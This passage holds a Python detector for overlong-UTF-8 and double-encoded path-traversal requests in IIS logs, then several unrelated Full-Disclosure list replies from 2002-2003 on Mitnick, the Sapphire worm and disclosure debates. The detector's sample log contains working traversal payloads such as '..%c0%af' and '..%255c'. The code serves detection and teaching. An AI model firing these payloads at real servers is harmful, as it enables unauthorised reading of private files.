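Example code, not from the list thread. Decoding order is the whole point:
a check that runs on the raw URL never sees the '/' hidden in %c0%af.
"""
import re
from urllib.parse import unquote_to_bytes

# A ".." path segment, checked only after the path has been fully decoded.
TRAVERSAL_RE = re.compile(r'(?:^|/)\.\.(?:/|$)')


def percent_decode_fully(path: str, max_rounds: int = 3):
    """Percent-decode repeatedly (bounded), so a double-encoded form such as
    %255c is seen first as %5c and then as a backslash.
    Returns (raw_bytes, number_of_rounds_that_changed_something)."""
    data = path.encode('utf-8')
    rounds = 0
    for _ in range(max_rounds):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds


def lenient_utf8_decode(data: bytes):
    """Decode UTF-8 the way a permissive server does, accepting overlong
    2- and 3-byte forms, and count how many overlong sequences were seen.
    Returns (text, overlong_count). A strict decoder rejects these forms;
    this one mirrors the buggy behaviour so we see the path the server used."""
    out = []
    overlong = 0
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:                                  # plain ASCII
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < n and 0x80 <= data[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:                             # 2-byte form of ASCII: overlong
                overlong += 1
            out.append(chr(cp))
            i += 2
        elif (0xE0 <= b <= 0xEF and i + 2 < n
              and all(0x80 <= x <= 0xBF for x in data[i + 1:i + 3])):
            cp = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            if cp < 0x800:                            # 3-byte form of a shorter char: overlong
                overlong += 1
            out.append(chr(cp))
            i += 3
        else:                                         # malformed byte: one placeholder char
            out.append('\ufffd')
            i += 1
    return ''.join(out), overlong


def analyze_path(raw_path: str) -> dict:
    """Decode, canonicalize and classify one request path."""
    data, rounds = percent_decode_fully(raw_path)
    try:
        data.decode('utf-8')                          # strict decoder rejects overlong forms
        strict_ok = True
    except UnicodeDecodeError:
        strict_ok = False
    text, overlong = lenient_utf8_decode(data)
    canonical = text.replace('\\', '/')               # IIS treats backslash as a separator
    if not TRAVERSAL_RE.search(canonical):
        label = 'clean'
    elif overlong:
        label = 'overlong-traversal'
    elif rounds > 1:
        label = 'double-encoded-traversal'
    else:
        label = 'traversal'
    return {'canonical': canonical, 'strict_utf8': strict_ok,
            'overlong': overlong, 'decode_rounds': rounds, 'label': label}


# Constructed W3C-style lines: date time client-ip method uri-stem query status.
SAMPLE_LOG = [
    '2003-02-13 07:58:01 10.0.0.5 GET /scripts/..%c0%af..%c0%afprivate/file.txt - 200',
    '2003-02-13 07:58:02 10.0.0.5 GET /index.html - 200',
    '2003-02-13 07:58:03 10.0.0.7 GET /scripts/../../private/file.txt - 404',
    '2003-02-13 07:58:04 10.0.0.9 GET /caf%c3%a9/menu.html - 200',
    '2003-02-13 07:58:05 10.0.0.7 GET /scripts/..%255c..%255cprivate/file.txt - 200',
]


def scan_log(lines):
    """Run analyze_path over the uri-stem field of each log line and return
    [(client_ip, label, canonical_path)] for every request that is not clean."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        ip, uri = fields[2], fields[4]
        result = analyze_path(uri)
        if result['label'] != 'clean':
            hits.append((ip, result['label'], result['canonical']))
    return hits


if __name__ == '__main__':
    for ip, label, path in scan_log(SAMPLE_LOG):
        print(f'{ip:10} {label:26} {path}')
```

The line with %c3%a9 is there to show that non-ASCII in a path is not by itself suspicious: it is a valid two-byte sequence and decodes to a harmless name, whereas the strict-UTF-8 check fails only for the overlong request. The same decode-then-match order is what a proxy or IDS needs before applying any path rule.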


Re: [Full-Disclosure] [Secure Network Operations, Inc.] Full Disclosure != Exploit Release

2003-01-29 Thread Kevin Spett
He used his access to TRW and credit information for illegal purposes all
the time.  How do you think he stayed on the run for so long?  He found ways
of faking Western Union money transfers, using TRW data to impersonate
people and a litany of other things.  See Jon Littman's book _The Fugitive
Game_ for the details.

Also, having a large number of stolen credit card numbers did not earn him
the most wanted cyber-criminal award.  He was primarily in trouble for
intellectual property theft (read: source code).  He became the most wanted
cyber-criminal award because he evaded the police for years while
continuing to commit crimes.  That is what the most wanted lists are about.
People who cannot be caught and continue to break the law (or are likely to
do so).  And who did he set in fear?  He mostly just pissed people off.  Why
would you fear someone for having a large number of stolen credit card
numbers?  This world must be a scary place for you.



Kevin.


 Mitnick amassed a large number of stolen credit card numbers, that was what
 really earned him the most wanted cyber-criminal award in his time.  Even
 though I do not recall a documented case whence he ever used any of those
 numbers in a fraudulent manner.  It was the fear of his potential to
 garner and use them and set people in fear...

 Thanks,

 Ron DuFresne
 ~~
 Cutting the space budget really restores my faith in humanity.  It
 eliminates dreams, goals, and ideals and lets us get straight to the
 business of hate, debauchery, and self-annihilation. -- Johnny Hart
 ***testing, only testing, and damn good at it too!***

 OK, so you're a Ph.D.  Just don't touch anything.



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



Re: [Full-Disclosure] Is Sapphire the world's smallest computer worm?

2003-01-25 Thread Kevin Spett
I remember seeing (alleged) Morris worm source code on PacketStorm
awhile ago.


Kevin Spett
SPI Labs
http://www.spidynamics.com/

- Original Message -
From: Roland Postle [EMAIL PROTECTED]
To: Full-Disclosure [EMAIL PROTECTED]
Sent: Saturday, January 25, 2003 3:49 PM
Subject: Re: [Full-Disclosure] Is Sapphire the world's smallest computer worm?


 On Sat, 25 Jan 2003 14:22:19 -0500, Richard M. Smith wrote:

 At 376 bytes, is this new Sapphire worm the world's smallest computer
 worm?  The only competition I can think of is the Morse worm.  Anybody
 know how big it was?

 I suspect the morse worm was bigger, therefore I'm prepared to offer a
 flashy World's smallest internet worm award (solid gold statuette on
 a marble stand with attached chrome plate which will be etched at a
 later date) to the author of this one. If they would just like to stand
 up and claim it 

 - Blazde



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



Re: [Full-Disclosure] Lock business practices security-by-obscurity for 150 years

2003-01-23 Thread Kevin Spett
Yes, but the real question here still remains:

What is Richard smoking and where can I get some of it?



Kevin.
- Original Message -
From: hellNbak [EMAIL PROTECTED]
To: Georgi Guninski [EMAIL PROTECTED]
Cc: Richard M. Smith [EMAIL PROTECTED];
[EMAIL PROTECTED]
Sent: Thursday, January 23, 2003 2:38 PM
Subject: Re: [Full-Disclosure] Lock business practices
security-by-obscurity for 150 years


 On Thu, 23 Jan 2003, Georgi Guninski wrote:


  Richard, you seem to be smoking something bad today.
  If you look at your trollish analogy, from the quote above you will see that
  such problems are disclosed in locksmith trade journals at least.
  And who cares if micro$osft relies on obscurity?
 

 Georgi, you are letting your immature hatred for Microsoft cloud your
 vision, but what else is new.  Yes, this issue has been known for 150
 years by locksmiths and they didn't understand the security risks or they
 did and didn't care because they didn't think that anyone else would know
 about it.  But, as with most things this wasn't the case.  Others, outside
 of the locksmithing industry no doubt knew about this as well.  With no
 one in the locksmithing industry running out and telling anyone this
 would have made a nice little secret to hang on to.

 So yes, this was security through obscurity.  Without public disclosure
 there would be little motivation for lock companies to retool and create
 better locks.

  --
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 I don't intend to offend, I offend with my intent

 [EMAIL PROTECTED]
 http://www.nmrc.org/~hellnbak

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



Re: [Full-Disclosure] Australia becomes a police state [serious]

2002-12-06 Thread Kevin Spett
I don't know what the laws in .au are like, but in the US no one can
investigate or challenge an action made that is part of the war on
terrorism.  The information is considered so secret that it can never be
discussed in a court, not even in front of a Supreme Court Justice or the
Senate, not even in front of the Senate intelligence committee.  So in the
US, if they want to harass people and insist that it's part of the war on
terror, they can.  Due process, even under order of federal courts, has been
*ignored* by the US military and nothing has been done about it.



Kevin.


 Umm.  Not to rain on your Indymedia-inspired parade, Silvio, but have
 you read the legislation, or any of the discussions in parliament
 surrounding it?  Or have you only read the hyperbolic predictions of doom
 that Indymedia agitators have made?  The single key point that seems to
 be missing in Indymedia forums postings as of early this morning when I
 last checked is that these powers are only intended to be invoked in
 the event of a terrorist attack on the State.  Not for random
 harassment of random ethnic groups, raids on J Random Hacker, or raids
 on political agitators.  Nor will graphing the local courthouse cause
 these laws to be invoked.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



Re: [Full-Disclosure] Hah now this redefines selling out.

2002-10-03 Thread Kevin Finisterre

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yeah don't get me wrong ... I understand his situation totally. I didn't
see the note at the bottom of the ebay auction that stated it would be
used to pay for legal fees until after I sent the email. I just can't
imagine paying that much for an old toshiba laptop.  I have a slightly
used Toshiba 400cs that I am willing to sell for $15,000 dollars if
anyone is interested.
=]
- -KF


Phantasm wrote:

|When you are looking to pay off legal fees for the past as well as the
|legal fees to get your radio license reinstated, it would sound like a
|good idea.
|
|Not including Kevin paid about $6,000 in November before the raid and
|the laptop confiscated, need someway to get that laptop paid for.
|
|If you were stuck in the hole trying to pay shit off, you would pawn
|some old shit to pay it as well.
|
|In a week or so, his cell equipment is going up too... Gonna bitch about
|that as well?
|
|Rob
|Textbox Networks
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQE9nP+rMZ9vzENm4VURAmYXAJ0ZpOUab/JMyIQuzgU/yyRr6dc0fwCeLe+G
7afJHh6T4EniAMvJiD/HyL4=
=6Bqg
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html